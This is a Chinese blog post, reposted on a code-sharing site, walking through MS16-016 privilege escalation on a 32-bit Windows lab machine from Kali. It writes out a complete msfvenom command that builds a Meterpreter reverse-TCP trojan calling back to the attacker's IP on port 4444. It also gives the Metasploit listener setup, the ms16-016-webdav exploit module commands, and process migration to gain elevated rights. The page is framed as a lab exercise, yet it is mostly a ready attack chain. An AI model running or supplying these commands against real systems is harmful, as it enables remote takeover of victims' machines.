ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

ms16-016提权

2021-05-08 12:31:30  阅读:177  来源: 互联网

标签:32.132 set 192.168 提权 4444 ms16 016


ms16-016提权

简介:靶机需32位windows系统
攻击机:kali IP地址为:192.168.32.132
目标机:windows32 IP地址:192.168.32.135
先ping两台主机看是否通

步骤:
1)生成木马,设置本地ip地址192.168.32.132和端口号4444

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.32.132 LPORT=4444 -f exe > /root/test.exe

在这里插入图片描述

2)将木马复制到靶机
在这里插入图片描述

3)kali启动监听
开启msf服务
执行命令:msfconsole
使用监听模块
执行命令:use exploit/multi/handler
在这里插入图片描述

set lport 4444
Run

在这里插入图片描述

4)靶机运行木马
在这里插入图片描述

5)得到会话,建立连接并将会话置于后台

Background

在这里插入图片描述

6)使用ms16-016

use exploit\windows\local\ms16-016-webdav
set session 2
set lport 4444
run

获取注入的进程号
在这里插入图片描述

7)获取后台会话,进入注入进程,进程号为2720

sessions 2
migrate 进程号

提权成功
在这里插入图片描述

标签:32.132,set,192.168,提权,4444,ms16,016
来源: https://blog.csdn.net/qq_54713392/article/details/116522673

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有